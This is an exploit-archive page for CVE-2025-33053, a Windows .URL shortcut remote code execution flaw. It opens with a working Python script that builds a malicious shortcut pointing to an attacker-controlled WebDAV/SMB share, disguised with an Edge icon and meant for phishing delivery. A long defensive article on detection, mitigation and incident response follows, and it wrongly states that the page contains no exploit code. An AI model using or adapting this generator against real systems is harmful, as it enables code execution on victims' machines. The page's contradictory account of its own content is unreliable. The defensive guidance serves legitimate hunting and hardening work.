WebDAV Windows 10 - Remote Code Execution (RCE)

Exploit Author: Dev Bui Hieu Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2025-06-15 
Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
Date: June 2025
Author: Dev Bui Hieu
Tested on: Windows 10, Windows 11
Platform: Windows
Type: Remote
CVE: CVE-2025-33053

Description:
This exploit leverages the behavior of Windows .URL files to execute a
remote binary over a UNC path. When a victim opens or previews the .URL
file (e.g. from email), the system may automatically reach out to the
specified path (e.g. WebDAV or SMB share), leading to arbitrary code
execution without prompt.

```bash
python3 gen_url.py --ip 192.168.1.100 --out doc.url
```

import argparse

def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
    content = f"""[InternetShortcut]
URL={url_target}
WorkingDirectory={working_directory}
ShowCommand=7
IconIndex={icon_index}
IconFile={icon_file}
Modified={modified}
"""
    with open(output_file, "w", encoding="utf-8") as f:
        f.write(content)
    print(f"[+] .url file created: {output_file}")

def main():
    parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
    
    parser.add_argument('--out', default="bait.url", help="Output .url file name")
    parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
    parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
    parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                        help="Target executable path on victim machine")
    parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                        help="Icon file path")
    parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
    parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")

    args = parser.parse_args()

    working_directory = fr"\\{args.ip}\{args.share}\\"

    generate_url_file(
        output_file=args.out,
        url_target=args.exe,
        working_directory=working_directory,
        icon_file=args.icon,
        icon_index=args.index,
        modified=args.modified
    )

if __name__ == "__main__":
    main()


WebDAV Windows 10 - Remote Code Execution (CVE-2025-33053)

This article explains CVE-2025-33053 — a remote code execution (RCE) risk involving Windows .URL shortcut handling and remote resources (for example WebDAV/SMB shares). It describes the vulnerability at a high level, realistic threat models, detection approaches, and practical mitigations for defenders and administrators. The goal is to provide actionable defensive guidance while avoiding exploitation details.

Executive summary

Windows .URL shortcut files can instruct the system to resolve and retrieve resources over network protocols. Under certain conditions on Windows 10 and Windows 11, an attacker-controlled network resource referenced by a crafted .URL file may cause the victim system to download and run a binary without an explicit user prompt. Successful abuse can lead to remote code execution in the context of the user (or higher, depending on environment and configuration).

Affected components and scope

  • Tested platforms: Windows 10 and Windows 11 (per public reporting).
  • Affected behavior: the .URL (Internet Shortcut) handling and how Windows resolves remote icons/working directories or follows UNC/WebDAV paths during preview/open operations.
  • Attack vector: User receives a crafted .URL file (e.g., via email, archive, or other file delivery) and opens or previews it in explorer/Outlook or another viewer that triggers network resolution.
  • Impact: Arbitrary code execution on the targeted host; severity depends on user privileges and environment.

High-level mechanics (non-actionable)

At a conceptual level, the vulnerability arises because the Windows shell and some preview/handler components may automatically access network resources referenced inside .URL metadata (for example to obtain an icon, working directory, or referenced target). When those network resources are controlled by an attacker, the client may retrieve and process remote content in a way that leads to code execution. This class of issue is a common pattern in "file-crafted-to-trigger-network-fetch" vulnerabilities: the file format itself is used to force the victim to contact a remote host.

Important defensive note: this article does not provide exploit code, reproduction steps, or configuration details that would enable remote exploitation. The remainder focuses on detection, mitigation, and incident response.

Realistic attack scenarios and threat model

  • Phishing with weaponized .URL attachments: Target receives a convincing email with a .URL attachment that is opened or previewed.
  • Drive‑by file shares: An attacker places malicious .URL files on removable media or shared drives accessible to users.
  • Supply-chain/document sharing: A malicious .URL embedded inside an archive or a shared collaboration space triggers a remote fetch when previewed.
  • Network-based pivot: If attackers can host malicious resources on a reachable WebDAV/SMB endpoint, they may use this to deliver payloads to clients that resolve the shortcuts.

Indicators of compromise (IoCs) and what to look for

  • Unusual outbound network connections from explorer.exe, or other shell/preview processes, to external hosts or to internal hosts that are not regularly accessed by the user.
  • New or unexpected .URL files in user folders (Desktop, Downloads, Documents) or in email attachments.
  • Process creation events where explorer/preview handlers open a network resource, especially followed by execution of code from a network location.
  • Alerts from endpoint protection products showing blocked or quarantined payloads retrieved shortly after a .URL file was accessed.
  • Network logs showing SMB (port 445) or WebDAV/HTTP(S) traffic initiated by client endpoints to suspicious servers in temporal proximity to file access.

Detection: practical defender queries and scripts

Below are safe, defensive examples you can use to detect potentially malicious .URL activity. These examples are for triage and hunting only — they do not contain exploit steps.

PowerShell (defensive) - locate .url files and read URL fields:
Get-ChildItem -Path C:\Users\*\Desktop,C:\Users\*\Downloads -Filter *.url -Recurse -ErrorAction SilentlyContinue |
  ForEach-Object {
    $content = Get-Content -Path $_.FullName -ErrorAction SilentlyContinue
    $urlLine = $content | Where-Object { $_ -match '^URL=' }
    if ($urlLine) {
      [PSCustomObject]@{
        File = $_.FullName
        URL  = $urlLine -replace '^URL='
        Modified = $_.LastWriteTime
      }
    }
  }

Explanation: This PowerShell snippet searches common user folders for .url files, reads each file, extracts any "URL=" line, and returns a simple object with filename, extracted URL, and last-modified timestamp. Use it on endpoints to locate suspicious shortcuts that reference network resources. Run with appropriate administrative rights and in reading-only mode for initial triage.

Example SIEM hunt (abstract)
Search for process creation where ParentImage is explorer.exe and Image ends with .exe located on network paths
AND correlating network connection events where SourceProcess is that process and DestinationIP is external or unusual.
(Adapt query to your SIEM fields.)

Explanation: This abstract SIEM instruction describes correlating process creation and network connection events. Look for when explorer.exe spawns a process that originates from or accesses network-hosted binaries, and cross-reference with outbound connections to unusual destinations. Adapt the fields to your SIEM (Splunk, Elastic, Sentinel, etc.).

Mitigations and hardening recommendations

Prioritize defence-in-depth measures that reduce exposure to malicious .URL files and to remote retrieval of executables.

  • Patch and update: Apply the Microsoft security updates addressing CVE-2025-33053 as soon as possible. Keep endpoint OS and clients current.
  • Block risky egress: Enforce egress filtering at network perimeter/firewalls to prevent SMB (TCP 445) and unauthorized remote file protocols to the internet. Restrict outbound HTTP/HTTPS to only approved destinations and inspect traffic with TLS inspection where policy allows.
  • Disable unnecessary services: If WebDAV or WebClient services are not required, consider disabling them in your environment to reduce the attack surface. (Make this change only after testing, as it may impact legitimate workflows.)
  • Email gateway controls: Block or quarantine .URL attachments at mail gateways and disable automatic preview of attachments in webmail clients or Outlook when possible.
  • Principle of least privilege and application control: Implement application whitelisting (AppLocker, Windows Defender Application Control) to prevent execution of binaries from untrusted network locations. Combine with EDR monitoring.
  • Disable preview panes and preview handlers: Where practical, disable file previews in Outlook and Windows Explorer for users who do not need them, or restrict preview handlers from fetching remote content.
  • User training and phishing resistance: Train users to treat unexpected attachments cautiously, and enforce policies that suspicious attachments should not be opened on corporate devices.
  • Endpoint protection tuning: Ensure EDR/AV products are configured to block execution of unsigned or unknown binaries from network shares and to alert on explorer.exe or preview processes making outbound connections to unusual hosts.

Incident response guidance

  • Upon detection, isolate the affected endpoint from the network to prevent further payload retrieval or lateral movement.
  • Collect relevant artifacts: the suspicious .URL file(s), process creation logs, network connection logs, and endpoint protection alerts. Preserve memory and disk images if you suspect a compromise.
  • Perform a full malware scan with updated signatures and use multiple tools if necessary to increase detection coverage.
  • Assess scope: search network shares, user folders, and mailboxes for related .URL or similar artifacts to determine if other users were targeted.
  • Reset credentials for accounts used on the affected host and review privileged account activity.
  • After remediation, re-image or restore the host from a trusted backup if you cannot conclusively verify clean state.

Long-term risk reduction and policy suggestions

  • Adopt strict egress controls and network segmentation between user workstations and file repositories containing executables.
  • Harden user endpoints through application allowlists and robust EDR telemetry collection (process creation, network connections, file system changes).
  • Enforce secure email gateway policies that block or sandbox risky attachment types and disable auto-preview for external content.
  • Maintain an incident playbook for file-based delivery vectors (including shortcuts) so triage and containment steps are fast and repeatable.

Summary

CVE-2025-33053 highlights how seemingly benign file formats that instruct the OS to resolve network resources can be abused for remote code execution. The most effective immediate defenses are timely patching, reducing unnecessary network file access, egress filtering, and application control. Combine these technical mitigations with detection and user-awareness measures to reduce exposure and improve response capability.

References and further reading

For official remediation guidance and technical details, consult vendor advisories and your security vendor documentation. Prioritise deploying vendor-published fixes and follow your organization’s change control procedures when applying configuration changes.